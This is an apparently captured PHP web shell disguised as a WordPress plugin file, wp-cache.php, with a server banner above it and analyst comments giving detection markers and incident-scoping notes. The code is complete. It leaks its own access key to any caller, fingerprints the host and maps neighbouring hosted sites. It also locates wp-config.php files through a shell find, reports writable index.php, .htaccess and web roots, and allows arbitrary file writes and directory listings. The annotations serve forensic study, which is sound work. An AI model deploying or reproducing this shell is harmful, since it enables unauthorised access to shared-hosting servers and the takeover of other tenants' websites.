HEX
Server: Microsoft-IIS/10.0
System: Windows NT WIN8095 10.0 build 20348 (Windows Server 2016) AMD64
User: kytoffice-001 (0)
PHP: 7.4.30
Disabled: exec,passthru,shell_exec,system,proc_open,popen,curl_multi_exec,show_source
File: h:/root/home/kytoffice-001/www/expresstinou/wp-content/plugins/cnnqrxx/wp-cache.php
<?php
/**
 * Lateral Scan - Minimal PHP scanner
 * PHP 5.4+ compatible, used instead of xshapi
 * Only scan + write + info
 *
 * Analyst summary: this file is a web shell. It answers HTTP requests with
 * JSON and dispatches on the `action` request parameter; the switch further
 * down handles get_master_key, info, scan, write and ls. `scan` inventories
 * neighbouring site directories and reports which of their files the PHP
 * process can modify; `write` stores caller-supplied bytes at a
 * caller-supplied path.
 *
 * Stable markers for file-content and access-log searches, all taken from
 * this file: the key prefix 'LSC_', the salt string 'lateral-2026', and the
 * `action=` / `key=` request parameters with the action names listed above.
 */
// Turn off PHP error reporting for this request; every response body is JSON.
error_reporting(0);
header('Content-Type: application/json');

// Caller-supplied key and action, read from $_REQUEST (so they can arrive in
// the query string or the request body; cookies too, depending on the
// request_order setting).
$key = isset($_REQUEST['key']) ? $_REQUEST['key'] : '';
$action = isset($_REQUEST['action']) ? $_REQUEST['action'] : '';

// Master key is derived from the file path:
// 'LSC_' + the first 24 hex characters of md5(absolute path of this file .
// 'lateral-2026'). The value is deterministic and contains no secret input.
$MASTER_KEY = 'LSC_' . substr(md5(__FILE__ . 'lateral-2026'), 0, 24);

// get_master_key works without a password.
// Because the key is returned to any caller before the key check below runs,
// that check does not restrict access: for incident scoping, treat every
// action in this file as reachable by anyone who could request this URL.
if ($action === 'get_master_key') {
    echo json_encode(array('master_key' => $MASTER_KEY));
    exit;
}

// Every other action requires the key obtained above; a mismatch ends the
// request with a JSON error.
if ($key !== $MASTER_KEY) {
    echo json_encode(array('error' => 'invalid key'));
    exit;
}

// Action dispatcher; only reached after the key comparison above succeeded.
switch ($action) {

// info: host fingerprint. Returns the PHP version, the script owner as
// reported by get_current_user(), the working directory, the document root
// (falling back to the working directory), the php_uname() string and the
// absolute path of this file.
case 'info':
    echo json_encode(array(
        'php' => phpversion(),
        'user' => get_current_user(),
        'cwd' => getcwd(),
        'docroot' => isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : getcwd(),
        'os' => php_uname(),
        'script' => __FILE__,
    ));
    break;

// scan: inventory of other sites hosted next to this one. This first part
// builds the response skeleton and the ordered list of candidate parent
// directories ($roots) that the later loops enumerate.
case 'scan':
    // Response skeleton; scanned_root is filled in once a root has matched.
    $results = array('all_domains' => array(), 'writable_domains' => array(), 'server_info' => array(
        'document_root' => isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : getcwd(),
        'current_user' => get_current_user(),
        'scan_time' => date('Y-m-d H:i:s'),
        'scanned_root' => null,
    ));

    // Find the user home from the document root
    $docRoot = isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : getcwd();

    // cPanel addon domain layout: /home/USER/public_html/DOMAIN/
    // Normal shared hosting: /home/DOMAIN/ or /var/www/DOMAIN/
    // NOTE(review): every hard-coded candidate below is a Unix-style path;
    // where the document root does not start with one of them, only the
    // dirname()-based candidates can apply.
    $roots = array();

    // 1) Subdirectories under public_html (cPanel addon domains)
    // docroot = /home/xxx/public_html → scan under public_html
    if (preg_match('#^(/home/[^/]+/public_html)#', $docRoot, $m)) {
        $roots[] = $m[1];
    }
    // It may also sit one level up
    $parentOfDocroot = dirname($docRoot);
    if (is_dir($parentOfDocroot . '/public_html')) {
        $roots[] = $parentOfDocroot . '/public_html';
    }
    // User home directory (the parent of public_html)
    if (preg_match('#^(/home/[^/]+)/#', $docRoot, $m)) {
        $userHome = $m[1];
        if (is_dir($userHome . '/public_html')) {
            $roots[] = $userHome . '/public_html';
        }
        // HestiaCP/VestaCP: /home/USER/domains/
        if (is_dir($userHome . '/domains')) {
            $roots[] = $userHome . '/domains';
        }
        // CWP: /home/USER/public_html/ or /home/USER/www/
        if (is_dir($userHome . '/www')) {
            $roots[] = $userHome . '/www';
        }
        $roots[] = $userHome;
    }

    // Derive the hosting root from docroot: /hosting/www/, /var/www/ etc.
    if (preg_match('#^(/hosting/www|/var/www|/var/www/vhosts)/#', $docRoot, $m)) {
        $roots[] = $m[1];
    }

    // Parent directory of docroot — most important! (ISPmanager, custom layouts)
    // /var/www/user/data/www/domain.com → /var/www/user/data/www/
    $docParent = dirname($docRoot);
    if ($docParent && $docParent !== '/' && $docParent !== $docRoot) {
        array_unshift($roots, $docParent); // prepend, so it is tried first
    }

    // 2) Classic shared hosting directories, plus the grandparent of docroot
    $roots = array_merge($roots, array(
        '/mnt/www', '/var/www', '/hosting/www', '/home', '/var/www/vhosts', '/var/www/html',
        dirname(dirname($docRoot))
    ));
    // Drop empty entries and duplicates; the remaining order is the scan order.
    $roots = array_unique(array_filter($roots));

    // Directory enumeration: walk the candidate roots in order and collect
    // their immediate subdirectories as site candidates.
    $domains = array();
    $scannedRoot = null;
    // Directory names never reported as sites.
    $skip = array('.', '..', 'backups', 'logs', 'tmp', 'cache', 'lost+found',
        'cgi-bin', '.well-known', 'wp-admin', 'wp-content', 'wp-includes');

    foreach ($roots as $root) {
        if (!is_dir($root) || !is_readable($root)) continue;
        // Listing errors are suppressed; an unreadable or empty root is skipped.
        $items = @scandir($root);
        if (!$items) continue;

        // Every non-hidden, non-skipped subdirectory of this root.
        $found = array();
        foreach ($items as $item) {
            if (in_array($item, $skip)) continue;
            if ($item[0] === '.') continue; // hidden dirs
            $fp = $root . '/' . $item;
            if (is_dir($fp)) {
                $found[] = array('name' => $item, 'path' => $fp);
            }
        }

        // Are there subdirectories here that look like domains?
        // The only test is whether the name contains a dot.
        $hasDomains = false;
        foreach ($found as $f) {
            if (strpos($f['name'], '.') !== false) { $hasDomains = true; break; }
        }

        if ($hasDomains) {
            // Directory containing domains — best result.
            // Note that all of $found is kept, including names without a dot.
            if (!$scannedRoot) {
                $scannedRoot = $root;
                $domains = $found;
            } else {
                // Append to the previous result (domains in different directories)
                $domains = array_merge($domains, $found);
            }
            // A public_html or domains root with domain-like entries is the best case — stop
            if (strpos($root, 'public_html') !== false || strpos($root, 'domains') !== false) {
                break;
            }
        }
    }

    // Remove duplicate domains: the first occurrence of each name wins.
    // $seen is reused by the wp-config.php fallback that follows.
    $seen = array();
    $unique = array();
    foreach ($domains as $d) {
        if (!isset($seen[$d['name']])) {
            $seen[$d['name']] = true;
            $unique[] = $d;
        }
    }
    $domains = $unique;

    // ── Fallback method: search for wp-config.php with find ──
    // If the directory scan returned nothing or very little, locate all WP sites with find.
    // Detection note: this branch makes the PHP worker spawn a shell running
    // `find ... -name 'wp-config.php'`, which is visible to process-level
    // telemetry on hosts that record child processes of the web server.
    // NOTE(review): the host banner captured with this sample lists exec among
    // the disabled functions; if that applied at run time, this fallback
    // returned no results there.
    if (count($domains) < 2) {
        $wpConfigs = array();
        // Search in readable parent directories
        $searchPaths = array();
        if (preg_match('#^(/home/[^/]+)/#', $docRoot, $hm)) {
            $searchPaths[] = $hm[1]; // user home
        }
        $searchPaths[] = '/home';
        $searchPaths[] = '/var/www';
        $searchPaths[] = '/var/www/vhosts';

        foreach ($searchPaths as $sp) {
            if (!is_dir($sp) || !is_readable($sp)) continue;
            $findResult = array();
            // Depth-limited search (5 levels), skipping backup and cache paths,
            // capped at 50 lines; stderr is discarded and PHP errors are suppressed.
            @exec("find " . escapeshellarg($sp) . " -maxdepth 5 -name 'wp-config.php' -not -path '*/backup*' -not -path '*/cache*' 2>/dev/null | head -50", $findResult);
            if (!empty($findResult)) {
                $wpConfigs = array_merge($wpConfigs, $findResult);
                break; // the first search path that yields results is enough
            }
        }

        // Derive domain name and webroot from the wp-config.php paths
        $findDomains = array();
        foreach ($wpConfigs as $configPath) {
            $webRoot = dirname($configPath);
            // Skip the site this script itself runs in
            if ($webRoot === $docRoot || $webRoot === rtrim($docRoot, '/')) continue;

            // Derive the domain name from the directory structure
            $parts = explode('/', trim($webRoot, '/'));
            $domainName = null;

            // /home/user/public_html/domain.com/ or /home/user/domain.com/
            // The last path component that contains a dot, is longer than 3
            // characters and does not start with a dot is taken as the name.
            foreach ($parts as $p) {
                if (strpos($p, '.') !== false && !in_array($p, array('public_html', 'httpdocs', 'www'))
                    && $p[0] !== '.' && strlen($p) > 3) {
                    $domainName = $p;
                }
            }

            // If no domain was found, fall back to the last directory name
            if (!$domainName) {
                $last = end($parts);
                if (strlen($last) > 2 && $last !== 'public_html' && $last !== 'httpdocs' && $last !== 'html') {
                    $domainName = $last;
                }
            }

            if ($domainName && !isset($seen[$domainName])) {
                $seen[$domainName] = true;
                $domains[] = array('name' => $domainName, 'path' => $webRoot, '_webroot' => $webRoot);
                $findDomains[] = $domainName;
                // Record the webroot directly so the later loop does not search for it again;
                // it becomes web_root when the entry is added to all_domains.
            }
        }

        // Mark in the response that the find fallback contributed results.
        if (!empty($findDomains)) {
            $results['server_info']['find_method'] = true;
            $results['server_info']['find_count'] = count($findDomains);
            if (!$scannedRoot) $scannedRoot = 'find';
        }
    }

    // Classification and output: resolve a web root for every candidate, test
    // what the PHP process can modify there, and emit the report.
    // For incident scoping, each entry in writable_domains names a file or
    // directory outside this site that the process could modify; those are
    // the paths to integrity-check first.
    $results['server_info']['scanned_root'] = $scannedRoot;

    foreach ($domains as $d) {
        // For domains found via find, the webroot is already known
        if (!empty($d['_webroot'])) {
            $webRoot = $d['_webroot'];
        } else {
        // Candidate web roots: the directory itself and common subdirectory names.
        $webRoots = array($d['path'], $d['path'].'/public', $d['path'].'/public_html', $d['path'].'/www', $d['path'].'/httpdocs', $d['path'].'/web');
        $webRoot = null;
        // First choice: a candidate that holds an index.php or index.html.
        foreach ($webRoots as $wr) {
            if (is_dir($wr) && (file_exists($wr.'/index.php') || file_exists($wr.'/index.html'))) {
                $webRoot = $wr;
                break;
            }
        }
        // Otherwise: the first candidate that is a readable directory.
        if (!$webRoot) {
            foreach ($webRoots as $wr) {
                if (is_dir($wr) && is_readable($wr)) { $webRoot = $wr; break; }
            }
        }
        } // end else (_webroot)

        // A site counts as WordPress when wp-config.php exists in its web root.
        $isWp = $webRoot && file_exists($webRoot . '/wp-config.php');
        // Three write checks: existing index.php, existing .htaccess, and the
        // web root directory itself.
        $indexWritable = $webRoot && file_exists($webRoot . '/index.php') && is_writable($webRoot . '/index.php');
        $htaccessWritable = $webRoot && file_exists($webRoot . '/.htaccess') && is_writable($webRoot . '/.htaccess');
        $dirWritable = $webRoot && is_writable($webRoot);

        // Every candidate is reported in all_domains, writable or not.
        $info = array(
            'domain' => $d['name'],
            'path' => $d['path'],
            'web_root' => $webRoot,
            'wordpress' => $isWp,
            'accessible' => is_readable($d['path']),
        );
        $results['all_domains'][] = $info;

        // Candidates with at least one writable target are also listed in
        // writable_domains, with one entry per writable path.
        if ($indexWritable || $htaccessWritable || $dirWritable) {
            $wInfo = array('domain' => $d['name'], 'web_root' => $webRoot, 'files' => array());
            if ($indexWritable) $wInfo['files'][] = array('type' => 'index.php', 'path' => $webRoot.'/index.php');
            if ($htaccessWritable) $wInfo['files'][] = array('type' => '.htaccess', 'path' => $webRoot.'/.htaccess');
            if ($dirWritable) $wInfo['files'][] = array('type' => 'dir_writable', 'path' => $webRoot);
            $results['writable_domains'][] = $wInfo;
        }
    }

    // Totals: all candidates, writable candidates, and WordPress installs.
    $results['server_info']['total_found'] = count($results['all_domains']);
    $wpCount = 0;
    foreach ($results['all_domains'] as $ad) { if ($ad['wordpress']) $wpCount++; }
    $results['summary'] = array(
        'total_domains' => count($results['all_domains']),
        'writable_count' => count($results['writable_domains']),
        'wordpress_count' => $wpCount,
    );
    echo json_encode($results);
    break;

// write: arbitrary file write. Both the destination path and the content are
// taken verbatim from the request, with no restriction to any directory, and
// file_put_contents() creates or overwrites the target. When a `base64`
// parameter is present (whatever its value) the content is base64-decoded
// first. The response echoes the path and the number of bytes written.
// This script records nothing itself, so what was written has to be
// reconstructed from web-server logs and file modification times.
case 'write':
    $path = isset($_REQUEST['path']) ? $_REQUEST['path'] : '';
    $content = isset($_REQUEST['content']) ? $_REQUEST['content'] : '';
    $isB64 = isset($_REQUEST['base64']);
    if ($isB64) $content = base64_decode($content);
    // Errors are suppressed; failure is reported only through the JSON body.
    $r = @file_put_contents($path, $content);
    if ($r === false) {
        echo json_encode(array('error' => 'write failed'));
    } else {
        echo json_encode(array('success' => true, 'path' => $path, 'size' => $r));
    }
    break;

// ls: directory listing for a caller-supplied path (default: the working
// directory). For every entry it returns the name, whether it is a directory
// or a file, the size of regular files (0 otherwise) and whether the PHP
// process can write to it.
case 'ls':
    $path = isset($_REQUEST['path']) ? $_REQUEST['path'] : getcwd();
    if (!is_dir($path)) { echo json_encode(array('error' => 'not a dir')); break; }
    $items = array();
    foreach (scandir($path) as $f) {
        if ($f === '.' || $f === '..') continue;
        $fp = rtrim($path,'/') . '/' . $f;
        $items[] = array('name' => $f, 'type' => is_dir($fp) ? 'dir' : 'file', 'size' => is_file($fp) ? filesize($fp) : 0, 'writable' => is_writable($fp));
    }
    echo json_encode(array('path' => $path, 'count' => count($items), 'items' => $items));
    break;

// Any other action value: JSON error that also lists the supported action
// names. That fixed response string is another stable marker for
// response-body inspection.
default:
    echo json_encode(array('error' => 'unknown action', 'actions' => 'get_master_key, info, scan, write, ls'));
}